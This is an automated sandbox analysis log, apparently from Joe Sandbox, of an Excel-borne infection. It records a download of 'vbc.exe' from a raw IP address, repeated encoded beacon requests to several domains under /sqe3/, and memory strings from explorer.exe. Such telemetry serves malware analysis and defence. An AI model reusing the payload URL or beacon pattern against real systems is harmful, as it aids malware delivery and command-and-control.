Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.mondzorg-postma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.cocogreensoil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1Host: www.moveoneic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.antillean-network.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.integratednourishment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.gregoryrecommends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.yanasacha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1Host: www.bigdillenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View	IP Address: 66.235.200.146 66.235.200.146

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: BIZLAND-SDUS BIZLAND-SDUS

Source: global traffic

HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 216.170.126.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121
Source: unknown	TCP traffic detected without corresponding DNS query: 216.170.126.121

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B71DA3C.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /hkcmd/vbc.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 216.170.126.121Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=b5w1+wtMG086+ku5rySlnuvQ6Xf8quQxjwBGS8AB8cD8tokaT2Rnkch2TwRAgrEjQEkeCg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.nziyade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=+ZQWL9nqnp3EOm8ikLy2BwgKdV18m5qkp85bGkYyvqO5Knmmx3CsQ0WtNG04x/T/vHfJsQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.coloringprintouts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=DRVVqDahppZVcoMwHtqBO8gGbVXxnEQtD1Fk26hq+CZg2PM8h76HHU2382Ywn2xY/MQpAg==&NreT=XJE0G4nHflj HTTP/1.1Host: www.ktproductreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=nOVFEnbxdO1KUFG+sKoXHHXF5stR7dv4oa+WZ4s9syusWu0cHacPS3mYPEahtKUV1nLuVQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.mondzorg-postma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=oXNDcZDlqRKH2hC5SoJ7dwvXOnFb9nMS++dxAtrFY1wLaleqRTsShLolmYf7RNmK9qOopw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.cocogreensoil.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=M2gi/2rftereO9YfyWfvr6V5Ia0b0txn97j0jlakpXVUd1e6zNbyBzYXevWhAV4c0pce3g==&NreT=XJE0G4nHflj HTTP/1.1Host: www.moveoneic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=i8a2XrM6c4PzlxrBAf6zuAf3nKYqRmED7KfomvOZBUX2ic3/OKgutfqGct8PuPO2yhcJFA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.antillean-network.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=ce2vMfxvjNzpIiuEEVRdBe9TyXbD+nO4E4YWLS1QBhRwWXpWwU+RSJ1ydcmIzRpEWYQ4mQ==&NreT=XJE0G4nHflj HTTP/1.1Host: www.integratednourishment.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=cV0NQ3cSoEjVqYMmg/VwqmhA8djIFQLMz29YYbqh0iCirm1PpN4CjJrzlAb4Rx9TAdAIgw==&NreT=XJE0G4nHflj HTTP/1.1Host: www.gregoryrecommends.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=doZAOm1JLTF4Hw2qDVobBoiqnusmrIjoueOoEC46DGrv2J4+txpFe/3Q5GbV3HQ5vdwqSA==&NreT=XJE0G4nHflj HTTP/1.1Host: www.yanasacha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sqe3/?cB=WEY89Cif+pIi2MLF1zVwoU92FBjT7mYFKn7NGwcjA7VjLh+ShZmG13goYNxo9cFbZs7f6w==&NreT=XJE0G4nHflj HTTP/1.1Host: www.bigdillenergy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.nziyade.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, must-revalidate, max-age=0Content-Type: text/html; charset=UTF-8Expires: Wed, 11 Jan 1984 05:00:00 GMTServer: Microsoft-IIS/8.5Link: <https://www.nziyade.com/wp-json/>; rel="https://api.w.org/"X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Thu, 26 Nov 2020 20:13:34 GMTConnection: closeContent-Length: 55925Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0d 0a 0d 0a 09 09 09 09 0d 0a 09 09 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 26 23 38 32 31 31 3b 20 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 73 2e 77 2e 6f 72 67 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 27 20 63 72 6f 73 73 6f 72 69 67 69 6e 20 72 65 6c 3d 27 70 72 65 63 6f 6e 6e 65 63 74 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 5a 69 79 61 64 65 20 50 69 64 65 20 26 61 6d 70 3b 20 4b 65 62 61 70 20 26 72 61 71 75 6f 3b 20 79 6f 72 75 6d 20 62 65 73 6c 65 6d 65 73 69 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 7a 69 79 61 64 65 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 33 2e 30 2e 30 5c 2f

Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161496067.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2149883651.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2144874723.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2145288067.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000002.2345242648.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2135887620.0000000002341000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2161663887.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
